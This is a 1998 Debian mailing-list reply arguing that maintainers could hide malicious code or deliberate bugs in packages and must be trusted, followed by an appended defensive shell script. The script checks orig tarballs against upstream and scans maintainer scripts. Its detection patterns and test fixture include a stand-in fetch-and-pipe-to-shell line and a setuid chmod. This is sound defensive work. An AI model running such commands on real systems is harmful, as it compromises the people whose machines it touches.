
Re: Trust in the Debian Build Process



On Mon, Nov 30, 1998 at 07:17:52AM -0500, Robert Edmonds wrote:
> On Mon, 30 Nov 1998, Jiri Baum wrote:
> 
> > > 	Umm, I never build any packages as root. fakeroot rules.
> > 
> > Yes, but you get root access to anyone who installs your packages, via the
> > install scripts.
> > 
> > Jiri <jiri@baum.com.au>
> 
> 
> *Only* packages with pre/post inst/rm scripts are affected by this. For
> the most part debhelper tends to generate the scripts, but since you've
> got me worried I'm going to go grep /var/lib/dpkg/info for nasties  ;-)

That is simple bullshit.

So as not to single anyone out...I'll use my package xfstt as an example
(which you are free to check: whether my orig.tgz is the same as the original
author's, and review my diff for it).

How hard would it be for me to introduce a small "bug" into it which would go
unnoticed?

Why does it HAVE to be the pre/post inst/rm ?

That is too easy to spot...it would be much easier for some malicious person
to add an "undocumented feature" or even a buffer overflow into the program
and then exploit it at will against any machine using it.

Sure... MANY packages have programs which are never run as root (or should
never be)...simple user utilities, but those tools still run as
users on systems, so they then have access to any account which uses such
a tool.

The "problem" here is that maintainers are "trusted" to be faithful
and benign. The only other way would be to have every upload verified and
security audited before being accepted.

While that would greatly increase the security of our system (even
in the absence of malicious maintainers), it would introduce an unacceptable
(IMHO) bottleneck in the process. This is one bottleneck which would
fill FAST.

We have a nice system of trust, and I think it works. Any system will
have its flaws. Really though...there has to be some trust.

After all, there is no more trust placed in a maintainer that what they
upload contains no malicious features, than in the upstream author not to
introduce malicious features in the next revision...or in the CD-ROM vendor
(for those who buy CD-ROMs) not to build a few compromised binaries.

-Steve
-- 
/* -- Stephen Carpenter <sjc@delphi.com> --- <sjc@debian.org>------------ */
"You can't legislate intelligence and common sense into people"
                -- Will Rogers 
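The two concrete checks this exchange gestures at, comparing a package's orig tarball with the one the upstream author published and grepping the maintainer scripts for anything nasty, as an added example in POSIX shell. This is not code from the message, from Debian, or from the xfstt package; the package name is taken from the message, while the file names, directory layout, grep patterns and the stand-in tarball contents are assumptions, and all input is constructed inline so the script runs offline.

```shell
#!/bin/sh
# Added example, not code from the mailing-list message or from Debian's
# tooling: two checks the thread mentions, written as shell functions.
#   orig_matches_upstream  compares a packaging orig tarball with the
#                          tarball the upstream author published (SHA-256)
#   scan_maint_scripts     greps maintainer scripts (the pre/post inst/rm
#                          files, which live in /var/lib/dpkg/info on an
#                          installed system) for patterns worth a look
# make_fixture builds constructed sample input so this runs offline; the
# file names, package name and grep patterns are assumptions.
set -eu

sha256_of() {
    # coreutils sha256sum where available, otherwise openssl.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$1" | cut -d' ' -f1
    else
        openssl dgst -sha256 "$1" | sed 's/^.*= //'
    fi
}

# 0 if the two files have the same SHA-256 digest, 1 otherwise.
# A repacked or "fixed up" orig tarball fails this even if it unpacks to
# the same tree; that is the point, the bytes should be upstream's.
orig_matches_upstream() {
    [ "$(sha256_of "$1")" = "$(sha256_of "$2")" ]
}

# Heuristic patterns (assumed, not exhaustive): fetch-and-pipe-to-shell,
# touching SSH authorized_keys, setting setuid/setgid bits, eval of
# base64-decoded data. Expect false positives; the output is a reading
# list, not a verdict.
SUSPICIOUS='(curl|wget)[^|]*[|][[:space:]]*(sh|bash)|authorized_keys|chmod[[:space:]]+([4-7][0-7]{3}|[ugoa]*[+][rwx]*s)|eval.*base64'

# Prints file:line:text for each hit across the maintainer scripts in the
# given directory. Returns 0 when nothing matched, 1 when something did.
scan_maint_scripts() {
    dir="$1"
    found=0
    for f in "$dir"/*.preinst "$dir"/*.postinst "$dir"/*.prerm "$dir"/*.postrm; do
        [ -f "$f" ] || continue          # unmatched glob stays literal; skip it
        if grep -EnH "$SUSPICIOUS" "$f"; then found=1; fi
    done
    return $found
}

# Constructed fixture: stand-in "tarballs" (plain files; the digest check
# does not care what is inside) and two maintainer-script directories.
make_fixture() {
    root="$1"
    mkdir -p "$root/tarballs" "$root/clean" "$root/dirty"
    printf 'xfstt 1.0 upstream release (constructed stand-in)\n' \
        > "$root/tarballs/xfstt-1.0.tar.gz"
    cp "$root/tarballs/xfstt-1.0.tar.gz" "$root/tarballs/xfstt_1.0.orig.tar.gz"
    { cat "$root/tarballs/xfstt-1.0.tar.gz"; printf 'one extra line\n'; } \
        > "$root/tarballs/xfstt_1.0.orig-repacked.tar.gz"
    cat > "$root/clean/xfstt.postinst" <<'EOF'
#!/bin/sh
set -e
if [ "$1" = configure ]; then
    update-rc.d xfstt defaults >/dev/null
fi
EOF
    cp "$root/clean/xfstt.postinst" "$root/dirty/xfstt.postinst"
    cat > "$root/dirty/notsofriendly.postinst" <<'EOF'
#!/bin/sh
set -e
curl -s http://example.invalid/setup | sh
chmod 4755 /usr/bin/xfstt
EOF
}

# Stand-alone demo over the constructed fixture.
T=$(mktemp -d)
make_fixture "$T"
orig_matches_upstream "$T/tarballs/xfstt_1.0.orig.tar.gz" "$T/tarballs/xfstt-1.0.tar.gz" \
    && echo "orig tarball matches upstream"
orig_matches_upstream "$T/tarballs/xfstt_1.0.orig-repacked.tar.gz" "$T/tarballs/xfstt-1.0.tar.gz" \
    || echo "repacked tarball does NOT match upstream"
scan_maint_scripts "$T/dirty" || echo "maintainer scripts above need a closer look"
rm -rf "$T"
```

On an installed system the maintainer scripts sit under /var/lib/dpkg/info, so `scan_maint_scripts /var/lib/dpkg/info` is the grep the quoted reply proposes; treat hits as things to read, not as findings. The digest comparison only proves the orig tarball is byte-identical to what upstream shipped, which is exactly the limit the message points out: it says nothing about whether upstream's own code is clean, and nothing about the Debian diff, which still has to be read.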

